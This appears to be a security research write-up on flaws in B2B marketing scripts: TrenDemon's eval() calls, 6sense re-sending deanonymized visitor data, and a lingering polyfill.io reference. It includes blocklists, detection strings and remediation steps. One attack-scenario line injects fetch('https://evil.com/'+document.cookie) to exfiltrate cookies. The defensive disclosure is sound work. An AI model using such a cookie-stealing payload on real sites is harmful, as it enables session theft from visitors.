DISCLOSURE: This investigation presents technical forensic findings from publicly observable network traffic. All PII has been redacted. This is security research, not an attack.
We found five zero-day vulnerabilities in the B2B marketing stack by visiting a privacy policy page with a HAR recorder. We were deanonymized while the page loaded from a compromised supply chain.
"I just got deanonymized reading a privacy policy—while the page loaded code from a CDN compromised by a Chinese acquisition 18 months ago."
— Discovery moment, 2025-12-04
BTI-2025-0023-A
6sense beacon re-transmits ENTIRE Epsilon deanonymization response (phone, address) to ALL 6sense customers via cached q.metadata.ores parameter. Visitors permanently deanonymized for 760 days.
BTI-2025-0025-A
Any TrenDemon customer can execute arbitrary JavaScript in visitor browsers via CTA configuration. 6 distinct eval() vectors in trends.min.js.
BTI-2025-0025-B
Video players (Wistia, Brightcove, Vidyard) weaponized as execution triggers. Video completion events fire eval(postCompletionScript). Marketing funnel = kill chain.
BTI-2025-0025-C
TrenDemon harvests Marketo _mkto_trk cookie via btoa(this.context.maCookie), exfiltrates to trackingapi.trendemon.com on form submission.
BTI-2025-0025-D
TrenDemon SDK still references polyfill.io - domain compromised by Funnull CDN in June 2024. Older browsers (IE11, Safari <9) load malware. Function misspelled as 'loadPollyills'.
TrenDemon's SDK contains 6 distinct eval() code execution vectors. Any TrenDemon customer (or attacker with CTA access) can execute arbitrary JavaScript in visitor browsers through their dashboard configuration.
Attack Scenario: Create TrenDemon account → Configure CTA withfetch('https://evil.com/'+document.cookie) → Deploy on target site → Every visitor clicking CTA executes attacker code.
$Trd_Utils.sendGa4Tracking = function(ctaParams, event, page) {
var trackingCodeToEval;
switch(event) {
case "load":
trackingCodeToEval = ctaParams.CustomImpressionTrackingCode;
break;
case "click":
trackingCodeToEval = ctaParams.CustomClickTrackingCode;
break;
}
return (null == trackingCodeToEval ? void 0 : trackingCodeToEval.length)
? eval(trackingCodeToEval) // <-- ARBITRARY CODE EXECUTION
: dataLayer.push({...})
}t.prototype.loadPollyills = function (t) { // Note: MISSPELLED
if (Array.prototype.findIndex) t(); // Modern browser - skip
else {
var e = document.createElement("script");
e.src = "https://polyfill.io/v3/polyfill.min.js?features=...";
// LOADS FROM COMPROMISED DOMAIN ON OLDER BROWSERS
}
};In June 2024, polyfill.io was acquired by Funnull CDN and began injecting malware into 100,000+ websites. TrenDemon's production code STILL references the compromised domain 18 months later.
Fires when Array.prototype.findIndex unavailable (IE11, Safari <9, older mobile browsers)
Function misspelled as loadPollyills instead ofloadPolyfills. This code hasn't been reviewed since it was written.
6sense beacon re-transmits the ENTIRE Epsilon deanonymization response(including phone, address) in the q.metadata.ores parameter. Any site running 6sense can retrieve this cached PII.
Once 6sense deanonymizes you on ANY website, your company info (phone, address, company name) is cached and available to ALL 6sense customers for 760 dayswithout hitting the Epsilon data broker again.
// HAR line 74639 - Beacon re-exfiltrates ENTIRE Epsilon response
GET /v1/beacon/img.gif?
q.metadata.ores={"company":"Ronin","phone":"[REDACTED]","address":"[REDACTED]"}
&6suuid=0868dc17054b1100573f016922000000304d0200
&company_id=24deccd977193c4
// ANY 6sense customer can retrieve this cached PII for 760 daysVideo players (Wistia, Brightcove, Vidyard) aren't just tracking engagement. They're execution triggers. When the video ends and the credits roll, eval(postCompletionScript) fires.
Wistia/Brightcove/Vidyard script injected via innerHTML. Visitor identity already captured.
Maximum engagement achieved. User has invested time, trust at peak. Perfect social engineering moment.
eval(postCompletionScript) executes. Video player was just a fancy setTimeout().
// Video completion triggers arbitrary code execution
if (this.model.videoScript && this.model.videoScript.length) {
var _ = document.createElement("dummy");
_.innerHTML = this.model.videoScript; // DOM injection
Array.from(_.querySelectorAll("script"))
.filter(function (t) { return t.src; })
.forEach(function (t) {
$Trd_Utils.isVideoScriptSourceValid(t.src) && // Wistia/Brightcove/Vidyard
$Trd_Utils.loadJs(t.src, new Date().getTime().toString());
});
}
// On video completion:
(_a.length) && eval(personal.postCompletionScript) // RCETrenDemon harvests Marketo's _mkto_trk cookie, Base64-encodes it as maCook, and exfiltrates it to trackingapi.trendemon.com on every form submission.
id:958-TTM-744&token:_mch-6sense.com-33fe35d4df8d6e33441925452a7b0e80Cross-vendor cookie sharing without consent. Links Marketo identity to TrenDemon visitor graph.
// Line 4994-5003 - Marketo cookie exfiltration
this.context.maCookie &&
(p.maCook = btoa(this.context.maCookie)); // Base64 encode stolen cookie
var g = "/api/experience/new-lead?" + params;
$Trd_Tools.JSONP(g, ...) // Exfiltrate to TrenDemon# TrenDemon (CRITICAL) ||trackingapi.trendemon.com^ ||assets.trendemon.com^ ||trendemon.com^ # 6sense (CRITICAL) ||6sc.co^ ||eps.6sc.co^ ||b.6sc.co^ # polyfill.io (COMPROMISED) ||polyfill.io^
# TrenDemon SDK "$Trd_Utils" "$Trd_Tools" "sendGa4Tracking" "CustomClickTrackingCode" "loadPollyills" // MISSPELLED "postCompletionScript" # Dangerous patterns eval(trackingCodeToEval) eval(actionScript) eval(personal.postCompletionScript)
IMMEDIATE ACTION
1. Remove TrenDemon
Delete all TrenDemon script tags from your site. Check GTM containers.
2. Block at CDN/WAF
Add *.trendemon.com and polyfill.io to blocklist.
3. Audit 6sense Integration
Review what subprocessors 6sense deploys on your domain. Check for TrenDemon AccountId.
4. Review Marketo Cookies
Check if trd_ma_cookie exists. If so, your Marketo data was harvested.
5. Notify Legal/DPO
760-day cookies violate GDPR. Cross-vendor data sharing requires disclosure.
DETECTION & MONITORING
1. SIEM Rule: eval() in Marketing Tags
Alert on eval( calls from known marketing domains in CSP reports.
2. Network Monitor: TrenDemon API
Watch for trackingapi.trendemon.com outbound connections.
3. CSP Header Update
Remove 'unsafe-eval'. Block *.trendemon.com in script-src.
4. HAR Analysis
Capture HAR on your marketing pages. Search for $Trd_Utils or loadPollyills.
5. Supply Chain Audit
Grep all vendor scripts for polyfill.io references. Replace with cdnjs or self-hosted.
PERSONAL PROTECTION
1. Install uBlock Origin
Add custom filter: ||trendemon.com^
2. Clear TrenDemon Cookies
Delete all cookies matching trd_* pattern.
3. Clear localStorage
Remove trd_vid_l and trd_vuid_l keys.
4. Block 6sense Domains
Add *.6sc.co to your blocklist to prevent deanonymization.
5. Use Modern Browser
polyfill.io only fires on IE11/Safari <9. Modern browsers skip the compromised CDN.
# uBlock Origin Custom Filters
||trendemon.com^ ||trackingapi.trendemon.com^ ||assets.trendemon.com^ ||6sc.co^ ||polyfill.io^
# Browser Console - Clear TrenDemon Data
// Clear cookies
document.cookie.split(";").forEach(c => {
if (c.trim().startsWith("trd_"))
document.cookie = c.split("=")[0] +
"=;expires=Thu, 01 Jan 1970";
});
// Clear localStorage
Object.keys(localStorage)
.filter(k => k.startsWith("trd_"))
.forEach(k => localStorage.removeItem(k));This is what we found by reading their privacy policy. Imagine what's running on YOUR site.